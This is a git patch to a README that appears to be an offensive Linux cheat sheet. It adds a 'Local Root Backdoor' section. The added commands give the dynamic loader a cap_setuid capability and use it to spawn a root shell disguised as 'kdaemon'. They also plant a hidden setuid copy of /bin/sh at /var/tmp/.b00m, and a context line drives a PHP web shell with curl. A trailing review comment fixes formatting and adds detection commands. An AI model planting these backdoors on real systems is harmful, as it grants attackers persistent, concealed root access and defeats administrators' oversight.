From e80e13c572fd2c2dfd97dd2809592931d6bc4918 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 16 Jul 2024 22:24:10 +0100 Subject: [PATCH] Update README.md --- README.md | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 4f6306e..66b1b11 100644 --- a/README.md +++ b/README.md @@ -1626,18 +1626,30 @@ curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id" **6.v. Local Root Backdoor** -Stay root once you got root +***1. Backdooring the dynamic loader with setcap + ```bash +### Execute as ROOT user fn="$(readlink -f /lib64/ld-*.so.*)" || fn="$(readlink -f /lib/ld-*.so.*)" || fn="/lib/ld-linux.so.2" setcap cap_setuid+ep "${fn}" ``` -Become root + ```bash -### Execute as non-root user +### Execute as non-root user to get root fn="$(readlink -f /lib64/ld-*.so.*)" || fn="$(readlink -f /lib/ld-*.so.*)" || fn="/lib/ld-linux.so.2" p="python" command -v python3 >/dev/null && p="python3" -exec "${fn:?}" "$p" -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")' +exec "${fn:?}" "$p" -c 'import os;os.setgid(0);os.setuid(0);os.execlp("bash", "kdaemon")' +``` + +***2. Good old b00m shell + +```shell +{ cp /bin/sh /var/tmp/.b00m; chmod 6775 /var/tmp/.b00m; } 2>/dev/null >/dev/null +``` + +```shell +exec /var/tmp/.b00m -p -c 'exec python -c "import os;os.setgid(0);os.setuid(0);os.execlp(\"bash\", \"kdaemon\")"' ```
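Review bot: the two new headings `***1. Backdooring the dynamic loader with setcap` and `***2. Good old b00m shell` open a `***` bold-italic run that is never closed, so Markdown renders the literal asterisks; either close them or use the `**...**` style of the existing `**6.v. Local Root Backdoor**` heading. The second technique also switches from the ```bash fence used by the rest of this hunk to ```shell; keep one tag. Since this is documentation, each technique should also name the artefact it leaves on the host so a reader auditing a box knows what to look for: `getcap -r / 2>/dev/null` lists the `cap_setuid+ep` file capability the first block adds to the dynamic loader, and `find / -type f -perm -6000 2>/dev/null` lists the setuid/setgid `/var/tmp/.b00m` copy of `/bin/sh` the second block creates; a one-line note on each would make the section useful for cleanup as well as persistence.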